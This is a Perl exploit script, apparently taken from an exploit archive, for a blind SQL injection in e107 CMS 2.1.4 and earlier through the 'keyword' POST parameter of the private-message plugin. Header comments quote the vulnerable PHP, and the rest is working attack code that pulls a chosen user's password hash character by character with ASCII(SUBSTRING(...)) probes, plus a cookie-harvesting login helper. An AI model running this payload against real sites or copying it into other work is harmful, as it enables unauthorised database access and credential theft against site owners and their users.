1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 |
#!/usr/bin/perl # # # e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit # # -------------------------------------------------------------------------- # [*] Discovered by staker - staker[at]hotmail[dot]it # [*] Discovered on 09/03/2017 # [*] Site Vendor: http://www.e107.org # [*] BUG: Blind SQL Injection # -------------------------------------------------------------------------- # # # Description # ------------------------------------------------------------------------- # e107 contains one flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the "e107_plugins/pm/pm.php" script # not properly saniting user-supplied input to the "keyword" POST variable # This may allow an attacker to inject or manipulate sql queries in # the backend database regardless of php.ini settings # ------------------------------------------------------------------------- # SHORT EXPLANATION # ----------------------------------- # # FILE:"e107_handlers/core_functions.php" # # 76. function vartrue(&$val, $default='') # 77. { # 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database # 79.return $default; # 80.} # # ---------------------------------- # # FILE: "e107/e107_plugins/pm/pm.php" # # # 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function. # 36. { # 37. pm_user_lookup(); # 38.} # # # # 615. function pm_user_lookup() # 616. { # 617.$sql = e107::getDb(); # 618. # 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized # 620. if($sql->gen($query)) # 621. { # 622. echo '['; # 623while($row = $sql->fetch()) # 624. { # 625. $u[] ="{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}"; # 626. } # 627. # 628.echo implode(",",$u); # 629.echo ']'; # ----------------------------------- # # # use your brain.. # # Greetz to: Warwolfz Crew, # meh, Dante90, SHADES MASTER and nexen # # -- 0gay -- # # ----------------------------------- # YOUR MOM IS NOT SAFE ANYMORE!! # CALL HER!! # ----------------------------------- use strict; use IO::Socket::INET; use LWP::UserAgent; my ($URL,$uid) = @ARGV; my @chars = (8..122); my ($i,$ord,$hash) = (1,undef,undef); if (@ARGV != 2) { usage(); } $URL = parse::URL($URL); syswrite (STDOUT,"[-] Crypted Password: "); for ($i=0;$i<=60;$i++) { foreach $ord (@chars) { if (e107::Query(sql($i,$ord),$URL) == 666 ) { syswrite (STDOUT,chr($ord)); $hash .= chr($ord); last; } if ($i == 2 and not defined $hash) { syswrite (STDOUT,"\n[-] Exploit Failed"); exit; } } } if (length($hash) == 60) { die "\[-]Exploit Successfully"; } else { die "\n[-] Exploit Failed"; } sub e107::Query { # 1st parameter, sql query # 2nd parameter, e107 website my ($query,$URL) = @_; my $response = undef; my $lwp = new LWP::UserAgent; $lwp->default_header('User-Agent' => 'Lynx (textmode)'); $response = $lwp->post($URL."/pm/", [ keyword => $query ]) or die $!; if ($response->content =~ /caption/) { return 666; } else { return 0; } } sub parse::URL { my $string = shift @_ || die($!); if ($string !~ /^http:\/\/?/i) { $string = 'http://'.$string; } return $string; } sub sql { # 1st parameter, an e107's userid # 2nd parameter substring number # 3rd parameter charcode number my ($i,$j,$sql) = (shift,shift,undef); $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#"; return $sql; } sub e107::Cookies { my ($username,$password) = @_; my ($packet,$content); my $host = "127.0.0.1"; # Valid Host(insert it manually) my $path = "/e107/";# Valid e107 path (insert it manually) my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In"; my $socket= new IO::Socket::INET( PeerAddr => $host, PeerPort => 80, Proto=> 'tcp', ) or die $!; $packet .= "POST ".$path."/login.php HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: Lynx (textmode)\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length:".length($data)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet.= $data; $socket->send($packet); while (<$socket>) { $content .= $_; } if ($content =~ /Set-Cookie: (.+?)/) { return $1; } else { die("[-] Login Failed..\n"); } # This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit. # it works without log-in, but if you got some trouble, try to use this one. # e107::Login('YOUR USERNAME','YOUR PASSWORD'); } sub usage() { print "[*---------------------------------------------------------*]\n". "[*e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit*]\n". "[*---------------------------------------------------------*]\n". "[* Usage: perl web.pl [host] [uid] *]\n". "[* *]\n". "[* Options:*]\n". "[* [host] insert a valid host*]\n". "[* [uid]insert a userid*]\n". "[*---------------------------------------------------------*]\n"; exit; } |